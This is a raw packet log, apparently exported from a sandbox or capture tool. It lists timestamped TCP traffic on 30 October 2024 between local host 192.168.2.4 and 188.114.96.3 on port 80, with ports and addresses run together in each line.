                                                        Oct 30, 2024 05:23:33.410080910 CET8050031188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:33.761533976 CET5003180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:33.767009020 CET8050031188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:33.994044065 CET8050031188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:34.044579029 CET5003180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:34.194804907 CET8050031188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:34.245837927 CET5003180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:34.319907904 CET5003780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:34.319919109 CET5003180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:34.325376987 CET8050037188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:34.325694084 CET8050031188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:34.325793982 CET5003780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:34.325797081 CET5003180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:34.325889111 CET5003780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:34.331190109 CET8050037188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:34.684597969 CET5003780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:34.690224886 CET8050037188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:34.957293034 CET8050037188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:35.011446953 CET5003780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:35.275758028 CET8050037188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:35.318211079 CET5003780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:35.327053070 CET5001780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:35.327357054 CET5003780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:35.328327894 CET5004480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:35.333085060 CET8050037188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:35.333132982 CET5003780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:35.333745003 CET8050044188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:35.333811045 CET5004480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:35.333918095 CET5004480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:35.339159966 CET8050044188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:35.405253887 CET5004480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:35.405363083 CET5004580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:35.410726070 CET8050045188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:35.410788059 CET5004580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:35.410902977 CET5004580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:35.416184902 CET8050045188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:35.450784922 CET8050044188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:35.763493061 CET5004580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:35.768863916 CET8050045188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:35.821120024 CET8050044188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:35.824851036 CET5004480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:36.005520105 CET8050045188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:36.060579062 CET5004580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:54.012653112 CET5012980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:54.084144115 CET8050129188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:54.210391045 CET5013080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:54.215857983 CET8050130188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:54.220828056 CET5013080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:54.220940113 CET5013080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:54.226181030 CET8050130188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:54.310867071 CET8050129188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:54.311117887 CET5012980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:54.574472904 CET5013080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:54.631963968 CET8050130188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:54.823973894 CET8050130188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:54.917797089 CET5013080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:55.029006958 CET8050130188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:55.074047089 CET5013080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:55.146925926 CET5012980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:55.151501894 CET5013080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:55.152921915 CET5013180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:55.157385111 CET8050130188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:55.157433033 CET5013080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:55.158272982 CET8050131188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:55.158339977 CET5013180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:55.158457041 CET5013180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:55.163722992 CET8050131188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:55.511775017 CET5013180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:55.517220020 CET8050131188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:55.766048908 CET8050131188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:55.808444977 CET5013180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:56.075627089 CET8050131188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:56.124670029 CET5013180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:56.203412056 CET5013280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:56.203422070 CET5013180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:56.208960056 CET8050132188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:56.209521055 CET8050131188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:56.209619045 CET5013280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:56.209629059 CET5013180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:56.209759951 CET5013280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:56.215073109 CET8050132188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:56.559592009 CET5013280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:56.565073013 CET8050132188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:56.822371006 CET8050132188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:56.870929003 CET5013280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:57.039412022 CET8050132188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:57.089667082 CET5013280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:57.165987968 CET5013280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:57.166820049 CET5013380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:57.350316048 CET8050133188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:57.350424051 CET5013380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:57.350754023 CET5013380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:57.352818966 CET8050132188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:57.352876902 CET5013280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:57.356903076 CET8050133188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:57.699212074 CET5013380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:57.705916882 CET8050133188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:57.934896946 CET5013380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:57.935026884 CET5013480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:57.940486908 CET8050134188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:57.941343069 CET8050133188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:57.942821980 CET5013480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:57.942828894 CET5013380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:57.942904949 CET5013480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:57.951266050 CET8050134188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:58.055356026 CET5013580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:58.060949087 CET8050135188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:58.061052084 CET5013580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:58.061199903 CET5013580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:58.066643953 CET8050135188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:58.295387983 CET5013480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:58.367055893 CET8050134188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:58.367085934 CET8050134188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:58.418790102 CET5013580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:58.424432993 CET8050135188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:58.542418003 CET8050134188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:58.589677095 CET5013480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:58.655775070 CET8050135188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:58.699071884 CET5013580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:58.748903990 CET8050134188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:58.792898893 CET5013480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:58.974843025 CET8050135188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:59.027194977 CET5013580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:59.105781078 CET5013480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:59.106056929 CET5013580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:59.107017994 CET5013680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:59.111699104 CET8050134188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:59.111758947 CET5013480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:59.112306118 CET8050136188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:59.112366915 CET5013680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:59.112531900 CET5013680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:59.113121986 CET8050135188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:59.113168955 CET5013580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:59.117795944 CET8050136188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:59.464817047 CET5013680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:59.470319986 CET8050136188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:59.706995964 CET8050136188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:59.761600018 CET5013680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:59.918560028 CET8050136188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:59.966905117 CET5013680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:00.038721085 CET5013780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:00.044991970 CET8050137188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:00.046896935 CET5013780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:00.047025919 CET5013780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:00.052293062 CET8050137188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:00.402687073 CET5013780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:00.408044100 CET8050137188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:00.678414106 CET8050137188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:00.732676029 CET5013780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:00.965150118 CET8050137188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:01.011601925 CET5013780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:01.720428944 CET5013780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:01.721057892 CET5013880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:01.727478981 CET8050137188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:01.727540970 CET5013780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:01.727544069 CET8050138188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:01.727610111 CET5013880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:01.727804899 CET5013880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:01.733062983 CET8050138188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:02.074203968 CET5013880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:02.079622030 CET8050138188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:02.324040890 CET8050138188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:02.386565924 CET5013880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:02.534905910 CET8050138188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:02.648098946 CET5013880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:02.648546934 CET5013980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:02.653847933 CET8050138188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:02.653865099 CET8050139188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:02.653937101 CET5013880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:02.653989077 CET5013980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:02.661389112 CET5013980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:02.666793108 CET8050139188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:03.012001991 CET5013980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:03.017538071 CET8050139188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:03.256624937 CET8050139188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:03.308455944 CET5013980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:03.449671984 CET8050139188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:03.453288078 CET5013680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:03.496166945 CET5013980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:03.568538904 CET5013980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:03.571373940 CET5014080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:03.574561119 CET8050139188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:03.574743032 CET5013980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:03.576832056 CET8050140188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:03.576921940 CET5014080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:03.577465057 CET5014080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:03.582811117 CET8050140188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:03.990916014 CET5014080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:03.996396065 CET8050140188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:04.153858900 CET5014180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:04.154567957 CET5014080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:04.159296989 CET8050141188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:04.159368992 CET5014180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:04.159600973 CET5014180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:04.160228968 CET8050140188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:04.160298109 CET5014080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:04.164967060 CET8050141188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:04.291132927 CET5014280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:04.296586037 CET8050142188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:04.296663046 CET5014280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:04.296758890 CET5014280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:04.302139997 CET8050142188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:04.511727095 CET5014180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:04.517123938 CET8050141188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:04.517205954 CET8050141188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:04.652276039 CET5014280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:04.657685995 CET8050142188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:04.757013083 CET8050141188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:04.808466911 CET5014180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:04.902230978 CET8050142188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:04.950931072 CET5014280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:04.967663050 CET8050141188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:05.014754057 CET5014180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:05.107672930 CET8050142188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:05.152698040 CET5014280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:05.225363016 CET5014280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:05.225419044 CET5014180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:05.226212978 CET5014380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:05.231076956 CET8050142188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:05.231615067 CET8050143188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:05.231720924 CET8050141188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:05.231749058 CET5014380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:05.231761932 CET5014280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:05.231832027 CET5014180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:05.231933117 CET5014380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:05.237255096 CET8050143188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:05.590154886 CET5014380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:05.595518112 CET8050143188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:05.836293936 CET8050143188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:05.980350018 CET5014380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:06.040776968 CET8050143188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:06.133347988 CET5014380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:06.170201063 CET5014480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:06.175786972 CET8050144188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:06.175862074 CET5014480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:06.175977945 CET5014480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:06.181366920 CET8050144188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:06.527570963 CET5014480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:06.532891989 CET8050144188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:06.771384001 CET8050144188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:06.966308117 CET8050144188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:06.966471910 CET5014480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:07.083844900 CET5014480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:07.084939003 CET5014580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:07.089612961 CET8050144188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:07.089751959 CET5014480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:07.090284109 CET8050145188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:07.090485096 CET5014580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:07.090485096 CET5014580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:07.095776081 CET8050145188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:07.452671051 CET5014580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:07.458156109 CET8050145188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:07.679929972 CET8050145188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:07.731358051 CET5014580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:07.894293070 CET8050145188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:07.949445009 CET5014580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:08.008894920 CET5014580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:08.009713888 CET5014680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:08.014535904 CET8050145188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:08.014601946 CET5014580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:08.014986992 CET8050146188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:08.015057087 CET5014680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:08.015168905 CET5014680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:08.020430088 CET8050146188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:08.371186018 CET5014680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:08.376660109 CET8050146188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:08.613293886 CET8050146188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:08.667839050 CET5014680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:08.930634975 CET8050146188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:08.982733965 CET5014680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:09.053426027 CET5014680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:09.053438902 CET5014780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:26.753127098 CET8050169188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:26.753192902 CET5016980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:26.753258944 CET5016980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:26.758522987 CET8050169188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:26.790112019 CET5016980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:26.791155100 CET5017080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:26.796437979 CET8050170188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:26.796506882 CET5017080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:26.796607018 CET5017080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:26.801873922 CET8050170188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:26.838866949 CET8050169188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:27.152565956 CET5017080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:27.158056974 CET8050170188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:27.224982977 CET8050169188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:27.225100040 CET5016980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:27.482115984 CET8050170188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:27.576778889 CET5017080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:27.595802069 CET8050170188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:27.683557987 CET5017080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:27.710004091 CET5017080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:27.714797020 CET5017180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:27.716027975 CET8050170188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:27.716228962 CET5017080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:27.720098972 CET8050171188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:27.720333099 CET5017180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:27.720427990 CET5017180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:27.725676060 CET8050171188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:28.074345112 CET5017180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:28.079910994 CET8050171188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:28.316744089 CET8050171188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:28.371042013 CET5017180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:28.507952929 CET8050171188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:28.558564901 CET5017180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:28.753664017 CET5017280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:28.759079933 CET8050172188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:28.759138107 CET5017280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:28.759349108 CET5017280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:28.764579058 CET8050172188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:29.108783007 CET5017280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:29.114145041 CET8050172188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:29.345716000 CET8050172188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:29.480432987 CET5017280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:29.555949926 CET8050172188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:29.678982019 CET5017380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:29.678981066 CET5017280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:29.684340954 CET8050173188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:29.684619904 CET8050172188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:29.684715033 CET5017380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:29.684717894 CET5017280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:29.684907913 CET5017380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:29.698050022 CET8050173188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:30.043049097 CET5017380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:30.048537016 CET8050173188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:30.322362900 CET8050173188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:30.371049881 CET5017380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:30.526385069 CET8050173188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:30.574225903 CET5017380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:30.646416903 CET5017180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:30.650768042 CET5017380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:30.651171923 CET5017480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:30.656529903 CET8050174188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:30.656599998 CET5017480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:30.656632900 CET8050173188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:30.656677008 CET5017380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:30.656843901 CET5017480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:30.662121058 CET8050174188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:31.011919975 CET5017480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.017560959 CET8050174188.114.96.3192.168.2.4
